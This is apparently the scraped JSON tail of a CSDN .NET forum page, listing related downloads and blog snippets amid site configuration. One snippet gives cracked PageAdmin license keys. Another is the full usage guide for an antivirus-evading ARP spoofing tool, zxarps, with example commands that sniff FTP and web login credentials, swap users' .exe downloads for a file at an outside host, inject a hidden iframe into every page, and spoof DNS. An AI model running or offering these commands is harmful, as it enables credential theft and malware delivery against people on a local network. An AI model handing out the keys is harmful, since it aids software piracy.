web.config 文件中替换\n\u003Cadd key=\"\u003Cem\u003EUrl\u003C\u002Fem\u003E\" value=\"localhost\" \u002F\u003E\n\u003Cadd key=\"License\" value=\"10a11082c5104c99ae0da1ba192161129ebe113bg9x81m9hu9\" \u002F\u003E\n\n127.0.0.1注册码:\n复制以下两行到 web.config 文件中替换\n\u003Cadd key=\"\u003Cem\u003EUrl\u003C\u002Fem\u003E\" value=\"127.0.0.1\" \u002F\u003E\n\u003Cadd key=\"License\" value=\"d960132afe816014e2fe3ee1051d715d110f5d0g9x9m9hu9\" \u002F\u003E\n\n注册后跟正版完全一样,没有任何限制。pageadmin有后门,谨慎使用。\n\n需要\u003Cem\u003E域名\u003C\u002Fem\u003E注册码可以发\u003Cem\u003E域名\u003C\u002Fem\u003E到邮箱 comsharp@qq.com 免费提供注册码。","createTime":"2014-02-26 15:30:05","dataReportQuery":"spm=1035.2023.3001.6557&utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Paid-1-6964385-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Paid-1-6964385-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default","dataReportClick":"{\"mod\":\"popu_645\",\"index\":\"1\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fu013791234\u002F6964385\",\"strategy\":\"2~default~OPENSEARCH~Paid\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Paid-1-6964385-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","dataReportView":"{\"mod\":\"popu_645\",\"index\":\"1\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fu013791234\u002F6964385\",\"strategy\":\"2~default~OPENSEARCH~Paid\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Paid-1-6964385-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","type":"download"},{"url":"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fweixin_42135073\u002F14980427","title":"Slack-logger-bot:\u003Cem\u003E一个\u003C\u002Fem\u003E简单的Slack bot,可以将您的所有团队消息保存在服务器上,即使您超过存档中的10,000条消息,您仍然可以阅读它们","desc":"松弛记录器机器人\n\u003Cem\u003E一个\u003C\u002Fem\u003E简单的Slack僵尸程序,可以将所有团队消息保存在服务器上,即使您超过存档中的10,000条消息,您仍然可以阅读它们。\n 该应用程序是在Node.js上使用Express 4构建的\n版\n1.0.0\n如何部署机器人\n安装Node.js\n克隆仓库:\n git@github.com:mlegy\u002Fslack-logger-bot.git\n安装应用程序\n npm install & mkdir logs\nforever安装以使应用程序永久运行。\n sudo npm install -g forever\nforever将应用程序作为服务运行\n forever start app.js\n在您的Slack中为每个渠道添加\u003Cem\u003E一个\u003C\u002Fem\u003EOutgoing WebHooks Integration\n 在每个外发WebHooks的\u003Cem\u003EURL\u003C\u002Fem\u003E字段中,写下您的服务器IP或\u003Cem\u003E域名\u003C\u002Fem\u003E,后跟端口号3000和logbot路由。 例如: http:\u002F\u002Fmyteam.com:3000\u002Flogbot : http:\u002F\u002Fmyteam.com:3000\u002Flogbot : http:\u002F\u002Fmyteam.com:","createTime":"2021-02-01 07:29:40","dataReportQuery":"spm=1035.2023.3001.6557&utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-2-14980427-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-2-14980427-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default","dataReportClick":"{\"mod\":\"popu_645\",\"index\":\"2\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fweixin_42135073\u002F14980427\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-2-14980427-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","dataReportView":"{\"mod\":\"popu_645\",\"index\":\"2\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fweixin_42135073\u002F14980427\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-2-14980427-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","type":"download"},{"url":"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fx173737624\u002F4295689","title":"zxarps免杀版","desc":"zxarps免杀版\n-idx [index] 网卡索引号\n\n-ip [ip] 欺骗的IP,用'-'指定范围,','隔开\n\n-sethost [ip] 默认是网关,可以指定别的IP\n\n-port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口\n\n-reset 恢复目标机的ARP表\n\n-hostname 探测主机时获取主机名信息\n\n-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,\n\n','隔开关键字,多个条件'|'隔开\n\n所有带+前缀的关键字都出现的包则写入文件\n\n带-前缀的关键字出现的包不写入文件\n\n带_前缀的关键字\u003Cem\u003E一个\u003C\u002Fem\u003E符合则写入文件(如有+-条件也要符合)\n\n-save_a [filename] 将捕捉到的数据写入文件 ACSII模式\n\n-save_h [filename] HEX模式\n\n-hacksite [ip] 指定要插入代码的站点\u003Cem\u003E域名\u003C\u002Fem\u003E或IP,\n\n多个可用','隔开,没指定则影响所有站点\n\n-insert [html code]指定要插入html代码\n\n-postfix [string] 关注的后缀名,只关注HTTP\u002F1.1 302\n\n-hack\u003Cem\u003EURL\u003C\u002Fem\u003E [\u003Cem\u003Eurl\u003C\u002Fem\u003E] 发现关注的后缀名后修改\u003Cem\u003EURL\u003C\u002Fem\u003E到新的\u003Cem\u003EURL\u003C\u002Fem\u003E\n\n-filename [name] 新\u003Cem\u003EURL\u003C\u002Fem\u003E上有效的资源文件名\n\n-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开\n\n格式: \u003Cem\u003E域名\u003C\u002Fem\u003E|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1\n\n-Interval [ms] 定时欺骗的时间间隔,默认是3秒\n\n-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者\n\n-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB\n\nexample:\n\n嗅探指定的IP段中端口80的数据,并以HEX模式写入文件\n\nzxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log\n\nFTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件\n\nzxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter \"_USER ,_PASS\" -save_a sniff.log\n\nHTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字\n\nzxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter \"+POST ,+user,+pass\" -save_a sniff.log\n\n用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探\n\nzxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter \"+POST ,+user,+pass|_USER ,_PASS\" -save_a sniff.log\n\n如果嗅探到目标下载文件后缀是exe等则更改Location:为http:\u002F\u002Fxx.net\u002Ftest.exe\n\nzxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix \".exe,.rar,.zip\" -hack\u003Cem\u003Eurl\u003C\u002Fem\u003E http:\u002F\u002Fxx.net\u002F -filename test.exe\n\n指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun\n\nzxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert \"just for fun\u003Cnoframes\u003E\"\n\n指定的IP段中的用户访问的所有网站都插入\u003Cem\u003E一个\u003C\u002Fem\u003E框架代码\n\nzxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert \"\u003C8))e src='xx' width=0 height=0\u003E\"\n\n指定的两个IP的总带宽限制到20KB\n\nzxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20\n\nDNS欺骗\n\nzxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns \"www.aa.com|222.22.2.2,www.bb.com|1.1.1.1\"","createTime":"2012-05-11 23:55:58","dataReportQuery":"spm=1035.2023.3001.6557&utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-3-4295689-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-3-4295689-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default","dataReportClick":"{\"mod\":\"popu_645\",\"index\":\"3\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fx173737624\u002F4295689\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-3-4295689-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","dataReportView":"{\"mod\":\"popu_645\",\"index\":\"3\",\"dest\":\"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fx173737624\u002F4295689\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-download-2~default~OPENSEARCH~Rate-3-4295689-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","type":"download"},{"url":"https:\u002F\u002Fblog.csdn.net\u002Fqq_35616296\u002Farticle\u002Fdetails\u002F106560550","title":"\u003Cem\u003E一个\u003C\u002Fem\u003E\u003Cem\u003Eurl\u003C\u002Fem\u003E请求的流程","desc":"主要流程\n1. \u003Cem\u003E域名\u003C\u002Fem\u003E解析\n\u003Cem\u003E域名\u003C\u002Fem\u003E解析就是根据\u003Cem\u003Eurl\u003C\u002Fem\u003E来获取对应的ip的过程。\n\n浏览器 会首先会去搜索浏览器自身的DNS缓存 , 如果找到了\u003Cem\u003Eurl\u003C\u002Fem\u003E对应的ip就直接返回\n如果浏览器自身的缓存里面没有找到对应的条目,那么浏览器会搜索操作系统自身的DNS缓存,如果找到且没有过期则停止搜索解析到此结束.\n如果在OS的DNS缓存里也没找到,那么尝试读取hosts文件(在linux和mac下,hosts在\u002Fetc\u002Fhosts里)\n如果在hosts文件中也没有找到对应的条目,浏览器就会发起\u003Cem\u003E一个\u003C\u002Fem\u003EDNS的系统调用,就会向本地配置","createTime":"2020-06-04 23:59:36","dataReportQuery":"spm=1035.2023.3001.6557&utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default","dataReportClick":"{\"mod\":\"popu_645\",\"index\":\"4\",\"dest\":\"https:\u002F\u002Fblog.csdn.net\u002Fqq_35616296\u002Farticle\u002Fdetails\u002F106560550\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","dataReportView":"{\"mod\":\"popu_645\",\"index\":\"4\",\"dest\":\"https:\u002F\u002Fblog.csdn.net\u002Fqq_35616296\u002Farticle\u002Fdetails\u002F106560550\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","type":"blog"},{"url":"https:\u002F\u002Fblog.csdn.net\u002F2201_75856701\u002Farticle\u002Fdetails\u002F128930279","title":"安全系列:XXX\u003Cem\u003E域名\u003C\u002Fem\u003E存在\u003Cem\u003EURL\u003C\u002Fem\u003E任意跳转漏洞","desc":"\u003Cem\u003EURL\u003C\u002Fem\u003E跳转攻击(\u003Cem\u003EURL\u003C\u002Fem\u003E Redirection),Web业务系统接收到用户提交的\u003Cem\u003EURL\u003C\u002Fem\u003E参数后,未对\u003Cem\u003EURL\u003C\u002Fem\u003E参数进行“可信\u003Cem\u003EURL\u003C\u002Fem\u003E”校验,就向用户浏览器返回跳转到该\u003Cem\u003EURL\u003C\u002Fem\u003E。","createTime":"2023-02-08 10:01:20","dataReportQuery":"spm=1035.2023.3001.6557&utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default","dataReportClick":"{\"mod\":\"popu_645\",\"index\":\"5\",\"dest\":\"https:\u002F\u002Fblog.csdn.net\u002F2201_75856701\u002Farticle\u002Fdetails\u002F128930279\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","dataReportView":"{\"mod\":\"popu_645\",\"index\":\"5\",\"dest\":\"https:\u002F\u002Fblog.csdn.net\u002F2201_75856701\u002Farticle\u002Fdetails\u002F128930279\",\"strategy\":\"2~default~OPENSEARCH~Rate\",\"extra\":\"{\\\"utm_medium\\\":\\\"distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\\\",\\\"dist_request_id\\\":\\\"1714135464422_22198\\\"}\",\"spm\":\"1035.2023.3001.6557\"}","type":"blog"}],"staffDOList":[{"id":null,"communityId":211,"username":"community_93","userNickname":"ASP.NET","roleCode":1,"status":1,"createUsername":"","updateUsername":"","avatarUrl":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Fdefault.jpg!1","createTime":"2021-05-12 18:07:05","updateTime":"2021-05-12 18:07:05","lastLoginTime":"2021-05-12 18:07:05"},{"id":null,"communityId":211,"username":"dotnetconf","userNickname":".Net开发者社区","roleCode":2,"status":1,"createUsername":"community_93","updateUsername":"","avatarUrl":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Fdefault.jpg!1","createTime":"2022-12-01 00:26:57","updateTime":"2022-12-01 00:26:57","lastLoginTime":"2022-12-01 00:26:57"},{"id":null,"communityId":211,"username":"weixin_41960540","userNickname":"R小R","roleCode":2,"status":1,"createUsername":"community_93","updateUsername":"","avatarUrl":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Faa17748a52c84d88ba031f9895a4ea32_weixin_41960540.jpg!1","createTime":"2022-04-16 21:18:57","updateTime":"2022-04-16 21:18:57","lastLoginTime":"2022-04-16 21:18:57"}],"communityConfig":{"scoreType":0,"scoreItems":{"0":"给本帖投票","1":"锋芒小试,眼前一亮","2":"潜力巨大,未来可期","3":"持续贡献,值得关注","4":"成绩优异,大力学习","5":"贡献巨大,全力支持"}},"shouldApply":false,"subscribeAble":false,"operatorAble":false,"commentNeedJoinCommunity":false},"default2014LiveRoom":[{"itemType":"","description":"高峰论坛","title":"2022 技术英雄会","url":"https:\u002F\u002Flive.csdn.net\u002Froom\u002Fiframe\u002Fcsdnnews\u002FfsNR5NWp?chat=1&title=1&footer=1","images":["https:\u002F\u002Fimg-home.csdnimg.cn\u002Fimages\u002F20221016050009.png"],"ext":{"time":"9:00","liveRoomUrl":"https:\u002F\u002Flive.csdn.net\u002Froom\u002Fcsdnnews\u002FfsNR5NWp"}}]},"isGooglebot":false,"canonical":"https:\u002F\u002Fwww.csdn.net\u002Ftopics\u002F280041857","openUrl":"","isApp":false,"localUrl":"https:\u002F\u002Fbbs.csdn.net\u002Ftopics\u002F280041857","typeId":"20680","hasIndex":false},"CFG":{"ALIPLAYER_VERSION":"v4","ALIPLAYER_H5_VERSION":"mobile_v1","ENV":"prod","ROOT_URL":"https:\u002F\u002Fcms-mall.csdn.net\u002F","VUE_APP_API_URL_SERVER":"http:\u002F\u002Fcms-community-api.internal.csdn.net\u002F","VUE_APP_API_URL":"https:\u002F\u002Fcms-api.csdn.net\u002F","LOGIN_URL":"https:\u002F\u002Fpassport.csdn.net\u002Faccount\u002Flogin","VUE_APP_DOMAIN_SKILL":"https:\u002F\u002Fedu.csdn.net\u002F","VUE_APP_DOMAIN_PATH":"https:\u002F\u002Fedu.csdn.net\u002F","VUE_APP_COMMUNITY_API_URL":"https:\u002F\u002Fcommunity-api.csdn.net\u002F","VUE_APP_CCLOUD_API_URL":"https:\u002F\u002Fbizapi.csdn.net\u002Fcommunity-cloud\u002Fv1\u002F","VUE_APP_SKILL_API_URL":"https:\u002F\u002Fbizapi.csdn.net\u002Fskilltree\u002Fapi\u002F","VUE_APP_SEARCH_PLUGIN_API_URL":"https:\u002F\u002Fbizapi.csdn.net\u002Fsearchplugin\u002F","VUE_APP_COMMUNITY_ASK_API_URL":"https:\u002F\u002Fmp-ask.csdn.net\u002F","VUE_APP_ME_URL":"https:\u002F\u002Fme.csdn.net\u002F","VUE_APP_CCLOUD_RESUME":"https:\u002F\u002Fbizapi.csdn.net\u002Fjob-api\u002F","VUE_APP_CCLOUD_MAIN":"https:\u002F\u002Fwww.csdn.net\u002F","VUE_APP_CCLOUD_UC":"https:\u002F\u002Fwww.csdn.net\u002F","VUE_APP_CCLOUD_BZP_API_URL":"https:\u002F\u002Fbizapi.csdn.net\u002F","VUE_APP_CCLOUD_START_API_URL":"https:\u002F\u002Fmp-action.csdn.net\u002F","VUE_APP_PRACTIVE":"https:\u002F\u002Fbizapi.csdn.net\u002Fdaily-practice\u002F","VUE_APP_CCLOUD_HOSTPATH":"https:\u002F\u002Fbbs.csdn.net\u002F"},"queries":{"pageId":[],"domain":["ccloud.csdn.net\u002Fccloud\u002Fdetail1"],"id":["280041857"],"deviceType":"pc","isSpider":"","hostname":["bbs.csdn.net"]},"basePath":"bbs.csdn.net\u002Fccloud\u002Ftopics\u002F280041857","hrefUrl":"https:\u002F\u002Fbbs.csdn.net\u002Ftopics\u002F280041857","active":0,"navBarFixed":false,"title":"关于url后跟一个陌生的域名的问题","isLive":false,"contentType":{"text":"text","picture":"picture","link":"link","video":"video","vote":"vote","live":"live","blog":"blog","long_text":"long_text","task_text":"task_text"},"liveUrl":"https:\u002F\u002Flive.csdn.net\u002Froom\u002Fiframe\u002F","spmExtra":{"id":211,"topicId":280041857},"keywords":"","description":"以下内容是CSDN社区关于关于url后跟一个陌生的域名的问题相关内容,如果想了解更多关于.NET社区社区其他内容,请访问CSDN社区。"};</script><script type="text/javascript" src="https://csdnimg.cn/release/cmsfe/public/js/runtime.3e5c09eb.js"></script><script type="text/javascript" src="https://csdnimg.cn/release/cmsfe/public/js/chunk/common.7672e502.js"></script><script type="text/javascript" src="https://csdnimg.cn/release/cmsfe/public/js/chunk/tpl/ccloud-detail/index.243a94d0.js"></script></body> <!----> <script> window.csdn.sideToolbar = { options: { qr: { isShow: true, data: [ { imgSrc: 'https://csdnimg.cn/release/cmsfe/public/img/ewm.9010d6e5.png', desc: "关注公众号" }, ] }, help: { isShow: false, }, contentEl: document.getElementsByClassName("cloud-maintainer")[0] }, }; </script> <script src="https://g.csdnimg.cn/side-toolbar/2.9/side-toolbar.js" ></script> <!----> <!----> <!----> <script src="https://csdnimg.cn/release/blog_editor_html/release1.7.5/ckeditor/plugins/codesnippet/lib/highlight/highlight.pack.js"></script> <script src="https://g.csdnimg.cn/lib/editor-page-detail/v2.2.0/js/runDetail.min.js"></script> <!----> <!----> <!----> <!----> <!----> <!----> <script src="https://g.csdnimg.cn/collection-box/2.1.0/collection-box.js"></script> <!----> <!----> <!----> <!----> <script src="https://g.csdnimg.cn/common/csdn-cert/csdn-cert.js"></script> <!----></html>